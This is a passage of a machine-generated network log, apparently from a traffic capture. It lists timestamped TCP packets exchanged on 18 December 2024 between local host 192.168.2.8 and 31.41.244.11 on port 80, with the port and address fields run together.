                                                                                                                                                                                          Dec 18, 2024 09:07:39.645534992 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.645565987 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.645641088 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.646835089 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.646846056 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.646893024 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.647792101 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.647842884 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.647912025 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.648986101 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.649018049 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.649050951 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.649107933 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.649899006 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.650012016 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.650230885 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.651029110 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.651077032 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.651118994 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.651253939 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.652129889 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.652188063 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.652226925 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.652280092 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.653238058 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.653285980 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.653335094 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.653382063 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.654643059 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.654738903 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.654769897 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.655041933 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.655474901 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.655561924 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.655591011 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.655689955 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.656563044 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.656610966 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.656651020 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.656699896 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.657641888 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.657692909 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.657732964 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.657776117 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.658734083 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.658772945 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.658776045 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.658909082 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.659868002 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.659915924 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.659960032 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.660012960 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.660985947 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.661045074 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.661068916 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.662019968 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.662053108 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.662106037 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.662190914 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.662306070 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.663136005 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.663189888 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.663340092 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.663414001 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.664284945 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.664340019 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.664376974 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.664427996 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.665446997 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.665498972 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.665524960 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.665592909 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.666444063 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.666501045 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.666539907 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.666604042 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.667542934 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.667671919 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.667717934 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.668661118 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.668761015 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.668806076 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.669775963 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.669912100 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.669953108 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.669992924 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.670954943 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.671036959 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.671088934 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.672009945 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.672064066 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.672108889 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.672148943 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.673104048 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.673224926 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.673269033 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.673371077 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.674293041 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.674343109 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.674381971 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.674510002 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.675347090 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.675399065 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.675437927 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.675484896 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.676373959 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.676425934 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.676493883 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.676594019 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.677467108 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.677521944 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.677567959 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.677635908 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.678600073 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.678646088 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.678685904 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.678730011 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.679676056 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.679729939 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.679810047 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.679866076 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.680799007 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.680860043 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.680917025 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.681914091 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.681972980 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.681999922 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.682043076 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.683002949 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.683079004 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.683092117 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.683136940 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.684106112 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.684180975 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.684185982 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.685153961 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.685198069 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.685281038 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.685324907 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.685415983 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.686316967 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.686399937 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.686484098 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.686562061 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.687402010 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.687459946 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.687510014 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.687555075 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.688524961 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.688585997 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.688714981 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.688792944 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.689619064 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.689666033 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.689721107 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.689802885 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.690776110 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.690818071 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.690911055 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.690962076 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.691888094 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.691940069 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.692018986 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.692198038 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.692933083 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.692981958 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.693053007 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.693135977 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.694123030 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.694164038 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.694181919 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.694211960 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.695125103 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.695169926 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.695274115 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.695378065 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.696295023 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.696357012 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.696376085 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.696420908 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.697334051 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.697376966 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.697419882 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.697468042 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.698442936 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.698539972 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.698558092 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.698616982 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.699573040 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.699634075 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.699665070 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.699708939 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.700651884 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.700711012 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.700748920 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.700795889 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.701750040 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.701814890 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.701853991 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.701896906 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.702788115 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.702847004 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.836025000 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.836065054 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.836112022 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.836177111 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.836524010 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.836633921 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.836693048 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.837383986 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.837435007 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.837464094 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.837507010 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.838493109 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.838543892 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.838593006 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.838643074 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.839564085 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.839677095 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.839737892 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.840681076 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.840765953 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.840790987 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.840837002 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.841766119 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.841826916 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.841927052 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.841981888 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.842906952 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.843033075 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.843085051 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.843991041 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.844094992 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.844139099 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.845097065 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.845140934 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.845179081 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.846132994 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.846198082 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.846235991 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.846332073 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.846369028 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.847286940 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.847341061 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.847404957 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.847443104 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.848536968 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.848584890 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.848592043 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.848623037 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.849498034 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.849545956 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.849581003 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.849628925 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.850593090 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.850708961 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.850745916 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.851692915 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.851788044 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.851829052 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.852863073 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.852905035 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.852935076 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.853065014 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.853990078 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.854038000 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.854078054 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.854116917 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.855010033 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.855110884 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.855133057 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.855174065 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.856359005 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.856432915 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.856493950 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.856592894 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.857788086 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.857846022 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.857909918 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.859127045 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.859128952 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.859247923 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.859301090 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.860017061 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.860028028 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.860078096 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.860111952 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.860790014 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.860869884 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.860869884 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.861618042 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.861704111 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.861722946 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.862124920 CET4972480192.168.2.831.41.244.11
